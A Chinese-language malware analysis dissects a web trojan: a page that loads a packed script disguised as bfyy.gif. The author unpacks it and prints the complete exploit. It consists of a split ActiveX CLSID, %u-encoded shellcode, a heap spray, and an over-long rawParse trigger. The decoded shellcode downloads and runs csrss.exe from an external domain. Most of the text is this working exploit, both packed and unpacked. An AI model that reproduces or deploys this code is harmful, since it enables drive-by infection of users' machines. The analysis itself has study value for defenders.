
bfyy.htm木马分析

     昨天分析了06014.html文件([06014.html木马分析]),今天决定把手术刀放到bfyy.htm这个文件上,用文本方式打开后,出现的是:

<script src=bfyy.gif></script>

    这个“图片”估计是伪装成图片的js文件,利用的是script标记的src只要指向内容为有效js的文件即可,不限后缀。

   下载下来后用UE打开,果然不出所料。在UE里全选并开启自动换行,出现以下代码:

eval
(
function(p,a,c,k,e,d)
{
     e=function(c)
{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String))
    {
           while(c--)
           {
               d[e(c)]=k[c]||e(c)
           }
           k=
           [
              function(e)
              {
                  return d[e]
              }
           ];
           e=function()
           {
                 return'\\w+'
           };
           c=1
    };
while(c--)
{
      if(k[c])
      {
          p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 e="1B:1A";2 h="1z-1x-1y";2 g="f-1C-1D";c=1H["1G"]("1F");2 j=e+h+g;c["1E"]("1w",j);2 b=t("%s"+"q"+"%s"+"q"+"%1v%8%1o%1n%1m"+"30%8%1k%1l%1p%u"+"1q%1u%m%1t%1s"+"%1r%1I%1J%21%1Z"+"1Y%1X%22%23%27%u"+"26%25%24%1W%1j"+"%1V%1O%1N%o%1M"+"1K%1L%1P%1Q%C%u"+"1U%1T%1S%1R%28"+"%17%C%H%G%K"+"L%M%P%O%N%u"+"Q%k%R%U%S"+"%V%8%J%E%D"+"F%r%I%m%T%u"+"1i%1c%8%k%1b"+"%1a%19%1d%1e%1h"+"1g%1f%18%W%10%u"+"Z%z%v%Y%X"+"%11%v%12%z%16"+"15%14%13%o%2q%u"+"3i%3h%3g%3e%l"+"%3f%3j%3k%3o%3n"+"29%3m%3l%3d%r%u"+"3c%35%34%33%31"+"%32%36%37%3b%3a"+"39%3q%3p%3v%3N%u"+"3K%3J%3I%3H%3F"+"%3M%3O%3L%3G%3D"+"3E%3u%3t%3r%3s%u"+"3w%3x%3C%3B%3A"+"%p%a%3y%3z%38"+"2Y%2r%2Z%2p%2n%u"+"2o%n%2s%2t%2x"+"%2w%2v%p%a%2u"+"2m%2l%2e%2d%2c%u"+"2a%2b%2f%n%2g"+"%2k%2j%a%2i%2h%2y%2z%2R%2Q%2P%2N%2O%2S%2T%2X%2W%2V%2U%2M%2L%2E%2D%2C%2A%l");2 4=t("%B"+"%B");2 9;9=20;2 6;6=9+b["7"];d(4["7"]<6)4+=4;y=4.A(0,6);5=4.A(0,4.7-6);d(5.7+6<2B)5=5+5+y;x=2F 2G();w=x;2K(i=0;i<2J;i++)w[i]=5+b;2 3=\'\';d(3["7"]<2I)3+="\\1\\1\\1\\1";3+="\\1";3+="\\1";3+="\\1";3+="\\1\\1\\1\\1";3+="\\1\\1\\1\\1";c["2H"](3);',62,237,'|x0a|var|chilam|bigblock|block|shabiqqoday2|length|u0000|shabiqqoday|u0041|shabiqq_code|ying_yings|while|shabiqqid||shabiqqidss|shabiqqids||shabiqqidx|uc683|u0065|ud88b|u6461|u04c7|u7972|90|u57ff|u90|unescape||u4343|qq12345678|shabiqqsss|fillblock|u4320|substring|u9090|u468b|u56|u0dc6|52|uc1c3|u031c|u5afc|u8300|u02|e1|uc103|ufa8b|uc303|u008b|f78b|u8b0e|u5904|u016a|u6ad0|u6ae8|uc7dc|u03c7|u6643|646d|u6303|u632f|u03c6|uec57|uff53|6a|u20|u088b|u8b40|u803e|u8046|u5613|u0057|ufa75|u3680|uec83|80|u5e|e859|uf359|u408b|u8b0c|u00|ua164|u5a00|u1c70|8bad|u1e74|u8b3c|u738b|u0840|uefe9|classid|E586|474|52E1D|6BE|clsid|A6E2|1A85A9B4D9FB|setAttribute|object|createElement|document|u0378|u8bf3|45|u59e9|ue2|u835f|u5908|u5e5f|ucd8b|u33c1|u03e1|ud1c3|0324|u74a6|u0e6a|u4e8b|03|ufb||u207e|u3314|u56ed|uf28b|ufb03|3f8b|u5157|u66c9|ff|6f44|u6e77|u4c52|u5500|u6e6f|u6f6c|u6f54|u7074|u7468|u65
6c|u6946|u6d6c|75|u6854|6572|u7469|u5c03|u0063|u4c00|u616f|u72|u6172|u6269|u4c64|u2f3a|u772f|u7865|0x40000|u2e73|u7372|u7363|new|Array|rawParse|4057|300|for|u2f63|u6970|u6e75|u632e|u7374|u312e|u7777|u2f6e|u6964|u5f78|u6564|u6e69|u2f72|78|u7845||u33d0|uacc0|uff58|u0040|u2451|uc085|uf975|u65|56|u53|u5251|68f0|u5300|u7804|u3300|u0344|uc765|2e61|u50c0|u5350|u6adc|u8bfc|u57|u5056|u595a|ud2ff|u5374|u7379|u6547|u0073|ue2ab|6574|u446d|u6957|u456e|u6f74|u6365|u7269|u73|65|u7465|u7264|u47ff|uffff|u0ce8|c3c0|u6441|u7250|u33ee|u636f'.split('|'),0,{}))
 

       function(p,a,c,k,e,d)这个函数,我隐约记得是个加密函数。上网一搜,果然是个加密的js文件。又要解密,哎,不懂啊。

      看到第一个单词是eval后,我想到了办法:
      把eval函数替换为"document.write",前后加上script标记,另存为html格式文件,运行后得出以下结果:

// Fragments of a COM CLSID that are concatenated below into shabiqqidx.
// Splitting the identifier across three literals is presumably meant to defeat
// naive signature matching on the full CLSID string — inferred, not stated in the post.
// Typical client-side mitigation for this class of attack is setting the kill bit
// for the control's CLSID and keeping (or removing) the vendor component.
var shabiqqid="clsid:6BE";
var shabiqqids="52E1D-E586-474";
var shabiqqidss="f-A6E2-1A85A9B4D9FB";
// The two object lines appear to have been commented out for this listing (they
// are live in the packed original above), so ying_yings is never created here.
//ying_yings=document["createElement"]("object");
var shabiqqidx=shabiqqid+shabiqqids+shabiqqidss;
//ying_yings["setAttribute"]("classid",shabiqqidx);

// Second-stage payload: %u-escaped 16-bit units decoded by unescape(). The leading
// %u9090 pairs are the conventional NOP padding; the tail decodes to Win32 API names
// and a download URL, as the author shows further down the post.
var shabiqq_code=unescape("%u90"+"90"+"%u90"+"90"+"%uefe9%u0000%u5a00%ua164%u00"+"30%u0000%u408b%u8b0c%u1c70%u"+"8bad%u0840%ud88b%u738b%u8b3c"+"%u1e74%u0378%u8bf3%u207e%ufb"+"03%u4e8b%u3314%u56ed%u5157%u"+"3f8b%ufb03%uf28b%u0e6a%uf359"+"%u74a6%u5908%u835f%u04c7%ue2"+"45%u59e9%u5e5f%ucd8b%u468b%u"+"0324%ud1c3%u03e1%u33c1%u66c9"+"%u088b%u468b%u031c%uc1c3%u02"+"e1%uc103%u008b%uc303%ufa8b%u"+"f78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u56"+"52%u57ff%u5afc%ud88b%u016a%u"+"e859%u0057%u0000%uc683%u5613"+"%u8046%u803e%ufa75%u3680%u5e"+"80%uec83%u8b40%uc7dc%u6303%u"+"646d%u4320%u4343%u6643%u03c7"+"%u632f%u4343%u03c6%u4320%u20"+"6a%uff53%uec57%u04c7%u5c03%u"+"2e61%uc765%u0344%u7804%u0065"+"%u3300%u50c0%u5350%u5056%u57"+"ff%u8bfc%u6adc%u5300%u57ff%u"+"68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u53"+"56%ud2ff%u595a%ue2ab%u33ee%u"+"c3c0%u0ce8%uffff%u47ff%u7465"+"%u7250%u636f%u6441%u7264%u73"+"65%u0073%u6547%u5374%u7379%u"+"6574%u446d%u7269%u6365%u6f74"+"%u7972%u0041%u6957%u456e%u65"+"78%u0063%u7845%u7469%u6854%u"+"6572%u6461%u4c00%u616f%u4c64"+"%u6269%u6172%u7972%u0041%u72"+"75%u6d6c%u6e6f%u5500%u4c52%u"+"6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u772f%u7777%u312e%u7374%u6e75%u632e%u2f6e%u6964%u2f72%u6e69%u6564%u5f78%u6970%u2f63%u7363%u7372%u2e73%u7865%u0065");

// Filler construction. bigblock starts as two 0x9090 units (length 2, as the
// author notes) and is doubled until it is at least shabiqqoday2 units long.
var bigblock=unescape("%u9090"+"%u9090");

var shabiqqoday;
shabiqqoday=20;
var shabiqqoday2;
shabiqqoday2=shabiqqoday+shabiqq_code["length"];   // 215 according to the author's note

while(bigblock["length"]<shabiqqoday2)             // bigblock["length"] is 2, so the condition holds (author's note)
bigblock+=bigblock;

// fillblock: exactly shabiqqoday2 units; block: what is left of bigblock after that.
// Both are assigned without var, i.e. they become implicit globals.
fillblock=bigblock.substring(0,shabiqqoday2);

block=bigblock.substring(0,bigblock.length-shabiqqoday2);

// Grow block until block + payload would reach 0x40000 (262144) UTF-16 units;
// each round roughly doubles block and appends fillblock.
while(block.length+shabiqqoday2<0x40000)       // author's note: block.length is 2, so the sum is 217 and the condition holds
block=block+block+fillblock;

// Heap-spray stage: 300 copies of filler+payload are kept alive in one array
// so the payload is repeated across a large region of the heap. A useful
// detection heuristic for defenders is exactly this shape — an array of large,
// near-identical strings that each end in %u-escaped code.
// qq12345678 is only an alias of the same array; i is an implicit global.
shabiqqsss=new Array();
qq12345678=shabiqqsss;
for(i=0;i<300;i++)
qq12345678[i]=block+shabiqq_code;

// Trigger argument: a run of \x0a bytes. The while has no braces, so only the
// first += is repeated until chilam reaches 4057 units; the indented lines after
// it are not part of the loop and run once each.
var chilam='';
while(chilam["length"]<4057)
     chilam+="\x0a\x0a\x0a\x0a";
     chilam+="\x0a";
     chilam+="\x0a";
     chilam+="\x0a";
     chilam+="\x0a\x0a\x0a\x0a";
     chilam+="\x0a\x0a\x0a\x0a";
    
// The over-long string is handed to the control's rawParse method. In this listing
// ying_yings is never created (its createElement line above is commented out), so
// this statement would throw a ReferenceError if the listing were run as-is.
ying_yings["rawParse"](chilam);

      把shabiqq_code按shellcode解码后得到:

éïd¡0‹@ ‹p­‹@‹Ø‹s<‹txó‹~ û‹N3íVWQ‹?û‹òjYó¦tY_ƒÇEâéY_^‹Í‹F$ÃÑáÁ3Éf‹‹FÃÁáÁ‹Ëú‹÷ƒÆ‹ÐjYèjÆ
RVÿWüZ‹ØjYèWƒÆVF€>€uú€6€^ƒì@‹ÜÇcmd CCCCfÇ/cCCÆ Cj SÿWìÇ\a.eÇDxeÀPPSVPÿWü‹ÜjÿWðhQ$@XÿÐ3À¬…ÀuùQRVSÿÒZY«âî3ÀÃè ÿÿÿGetProcAddressGetSystemDirectoryAWinExecExitThreadoadLibraryAurlmonRLDownloadToFileAhttp://www.1tsun.cn/dir/index_pic/csrss.exe

 

     还是那个木马。总算弄出来了,只是最后一段的具体含义还没弄明白,有机会再来看。
